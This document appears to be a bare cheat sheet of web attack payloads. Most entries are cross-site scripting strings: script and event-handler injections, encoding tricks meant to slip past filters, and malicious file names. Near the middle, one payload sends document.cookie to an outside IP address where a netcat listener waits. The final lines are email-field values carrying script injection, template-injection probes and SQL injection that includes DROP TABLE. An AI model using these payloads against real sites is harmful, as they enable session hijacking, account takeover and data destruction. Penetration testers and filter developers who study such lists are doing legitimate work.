"
;
<
>
<Svg/Onload=1
c5obc'+alert(1)+'p7yd5
<svg onload=alert(1)>
<script>alert(1)</script>
<</p>iframe src=javascript:alert()//
<script>alert('PoC')</script>
"><script>alert('XSS')</script>
"><script>alert(document.domain)</script>
"><img src=x onerror="alert(document.domain)">
<scr ipt>ale rt (1) </scr ipt>
%3cscript>alert('PoC')</script>
%25%33%63script>alert('PoC')</script>
<script>alert('PoC')</script>
</script><script>alert(1)</script>
["</script><script>alert(1)</script>"]
<a href="x">test</a>
<img src=x />
<img src=x onerror="alert(1);" />
<script>alert(1)</script>
<img src=x onerror="alert(document.cookie);" />
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';><
<a href="javascript:alert('PoC')">Click me</a>
<p><script>alert(1)</script></p>
<i nput type="text" id="search-text" name="query" value="" onfocus="alert(1)" autofocus="" />
draggable=true ondragstart="alert(1)
<IMG SRC=1 ONERROR=alert(1)>
<SVG ONLOAD=alert(1)>
<</div>script</div>>alert()<</div>/script</div>>
"><a href=j<TAB><NEWLINE><TAB><NEWLINE><TAB><NEWLINE>avascript:confirm("payload")>XSSs</a>
In the example below, set up a NetCat listener on port 80 sudo nc -nlvp 80. This listener will receive a connection on success.
<iframe src=http://10.10.10.10/report height="O" width="O"></iframe>
In the example below, set up a NetCat listener on port 80 sudo nc -nlvp 80. This listener will receive a connection on success.
<script>new Image().src="http://10.10.10.10/nothinghere.jpg?output="+document.cookie;</script>
%09%0d%0a%09%0d%0a%09%0d%0a%09%0d%0a%09%0d%0a%09%0d%0a%09%0d%0a%09%0d%0a%09%0d%0a%09%0d%0a%09%0d%0a%09%0d%0a%09%0d%0a
<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png
"> <script>alert(1)</script>
Standard
<script>alert(1)</script>
<a href="javascript:alert(1)">XSS</a>
<a href="JaVaScript:alert(1)">XSS</a>
<iframe src="javascript:alert(1)">
<script src="data:text/javascript,alert(1)"></script>
<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>
onclick
<a onclick="alert(1)">test</a>
<body onclick="alert(1)">test</body>
<textarea onclick="alert(1)">test</textarea>
<p onclick="alert(1)">test</p>
<svg onclick="alert(1)">test</svg>
<iframe onclick="alert(1)">test</iframe>
onmouseover
<a onmouseover="alert(1)">test</a>
<body onmouseover="alert(1)">test</body>
<p onmouseover="alert(1)">test</p>
<svg onmouseover="alert(1)">test</svg>
onload
<body onload=alert(1)>
<svg onload=alert(1)>
<iframe onload=alert(1)></iframe>
onerror
<image src/onerror=alert(1)>
<img src/onerror=alert(1)>
<script onerror=alert(1) src=/></script>
<body onerror=alert(1) onload=/>
javascript:alert(¨DOM")
"><script>alert(document.cookie)</script>
alert(1)
alert(document.cookie)
#<script>alert('xss')</script>
</SCript><svG/onLoad=alert(document.domain)>
Cookie: PHPSESSID=hd<script>alert(document.cookie)</script>np5
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
"<= 7 * 7 %>"@example.com
test+(${{7*7}} )@example.com
"' OR 1=1 -- '"@example.com
"mail'); DROP TABLE users;--"@example.com
[email protected]
john.doe@[127.0.0.1]
victim&[email protected]